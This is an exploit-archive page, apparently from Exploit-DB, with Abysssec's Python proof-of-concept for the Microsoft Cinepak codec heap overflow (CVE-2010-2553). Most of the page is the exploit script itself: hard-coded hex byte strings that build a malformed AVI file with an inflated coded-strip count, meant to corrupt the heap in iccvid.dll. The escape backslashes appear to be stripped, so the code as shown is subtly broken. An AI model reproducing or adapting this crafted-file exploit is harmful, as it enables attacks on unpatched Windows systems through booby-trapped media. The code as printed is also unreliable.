MOAUB #26 - Microsoft Cinepak Codec CVDecompress Heap Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MOAUB #26 - Microsoft Cinepak Codec CVDecompress Heap Overflow
# Published : 2010-09-26
# Author : Abysssec
# Previous Title : BS.Player 2.56 (Build 1043) .m3u and .pls Denial of Service Vulnerability
# Next Title : Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) Denial of Service

'''
 
  __  __  ____         _    _ ____  
 |  /  |/ __    /  | |  | |  _  
 |   / | |  | | /   | |  | | |_) |
 | |/| | |  | |/ / | |  | |  _ < 
 | |  | | |__| / ____  |__| | |_) |
 |_|  |_|____/_/    _____/|____/ 

http://www.exploit-db.com/moaub-26-microsoft-cinepak-codec-cvdecompress-heap-overflow-ms10-055/

'''

'''
  Title             : Microsoft Cinepak Codec CVDecompress Heap Overflow
  Version           : iccvid.dll XP SP3
  Analysis          : http://www.abysssec.com
  Vendor            : http://www.microsoft.com
  Impact            : High
  Contact           : shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           : @abysssec
  CVE               : CVE-2010-2553
  MOAUB Number      : 
'''


import sys

def main():

	aviHeaders = 'x52x49x46x46x58x01x00x00x41x56x49x20x4Cx49x53x54xC8x00x00x00x68x64x72x6Cx61x76x69x68x38x00x00x00xA0x86x01x00x00x00x00x00x00x00x00x00x10x01x00x00x4Ex00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x60x01x00x00x20x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x4Cx49x53x54x7Cx00x00x00x73x74x72x6Cx73x74x72x68x38x00x00x00x76x69x64x73x63x76x69x64x00x00x00x00x00x00x00x00x00x00x00x00xE8x03x00x00x10x27x00x00x00x00x00x00x4Ex00x00x00x20x74x00x00xFFxFFxFFxFFx00x00x00x00x00x00x00x00x60x01x20x01x73x74x72x66x28x00x00x00x28x00x00x00x50x01x00x00x20x01x00x00x01x00x18x00x63x76x69x64x84x8Dx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00'
	padding = 'x4Ax55x4Ex4Bx00x00x00x00x4Ax55x4Ex4Bx00x00x00x00'
	movi_tag = 'x4Cx49x53x54x5Cx00x00x00x6Dx6Fx76x69x30x30x64x63x10x00x00x00'
	cinepak_codec_data1 = 'x00x00x00x68x01x60x01x20'
	number_of_coded_strips = 'x00x10' 
	cinepak_codec_data2 = 'x10x00x00x10x00x00x00x00x00x60x01x60x20x00x00x00x11x00x00x10x41x41x41x41x41x41x41x41x41x41x41x41x11x00x00x10x41x41x41x41x41x41x41x41x41x41x41x41x11x00x00x10x41x41x41x41x41x41x41x41x41x41x41x41x11x00x00x10x41x00'
	idx_tag = 'x69x64x78x31x10x00x00x00x30x30x64x63x10x00x00x00x04x00x00x00x68x00x00x00'
	
	avifile = open('poc.avi', 'wb+')
	avifile.write(aviHeaders)
	avifile.write(padding)
	avifile.write(movi_tag)
	avifile.write(cinepak_codec_data1)
	avifile.write(number_of_coded_strips)
	avifile.write(cinepak_codec_data2)
	avifile.write(idx_tag)
	
	avifile.close()
	print '[-] AVI file generated'
	
if __name__ == '__main__':
    main()